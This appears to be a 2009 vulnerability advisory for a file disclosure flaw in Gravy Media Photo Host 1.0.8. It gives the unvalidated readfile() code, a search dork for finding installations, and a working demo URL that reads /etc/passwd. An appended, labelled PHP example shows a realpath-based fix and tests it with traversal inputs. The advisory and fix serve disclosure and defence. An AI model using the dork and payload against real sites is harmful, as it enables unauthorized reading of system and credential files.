# Title : Gravy Media Photo Host 1.0.8 Local File Disclosure Vulnerability
# Published : 2009-06-22
# Author : Lo$er
==================================================================
=========Gravy Media Photo Host 1.0.8 Local File Inclusion========
==================================================================
Vendor: http://www.gravy-media.com/
Download: register to download
Dork: "Powered by Gravy Media"
Discovered By: Lo$er
====Vulnerable code(forcedownload.php)====
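$filename = $_GET['file'];   // line 27: taken straight from the query string, no validation
readfile("$filename");       // line 70: contents of whatever path was supplied go to the client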
====Demo====
http://www.gravy-media.com/v108/forcedownload.php?file=%2Fetc%2Fpasswd
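A hardened form of the lookup in forcedownload.php, as an added example (not vendor code and not part of the original advisory): the requested name is resolved with realpath() and served only if it lands inside a fixed upload directory. The function name resolve_download(), the $uploads directory and the sample file names are assumptions made for illustration.

```php
<?php
// Added example; resolve_download() and the upload directory are hypothetical.

/**
 * Map a user-supplied name to a regular file inside $baseDir, or return null.
 */
function resolve_download(string $baseDir, string $requested): ?string
{
    // Reject empty input and NUL bytes before touching the filesystem.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Resolve ".." and symlinks first, then compare the canonical path.
    $real = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // The trailing separator stops "/srv/uploads_old" matching "/srv/uploads".
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Constructed sample data: a temporary upload directory holding one file.
$uploads = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'uploads_' . bin2hex(random_bytes(4));
mkdir($uploads);
file_put_contents($uploads . DIRECTORY_SEPARATOR . 'cat.jpg', 'constructed image bytes');

// Constructed inputs: one legitimate name, the advisory's path, a relative
// variant, and a name that does not exist.
$inputs = ['cat.jpg', '/etc/passwd', '../../../../../../../../etc/passwd', 'missing.jpg'];
foreach ($inputs as $name) {
    $path = resolve_download($uploads, $name);
    printf("%-36s => %s\n", $name, $path === null ? 'rejected' : 'served: ' . basename($path));
}

// Clean up the constructed sample data.
unlink($uploads . DIRECTORY_SEPARATOR . 'cat.jpg');
rmdir($uploads);
```

In a real handler, readfile() is called only on the non-null return value, and a null result maps to a 404 response.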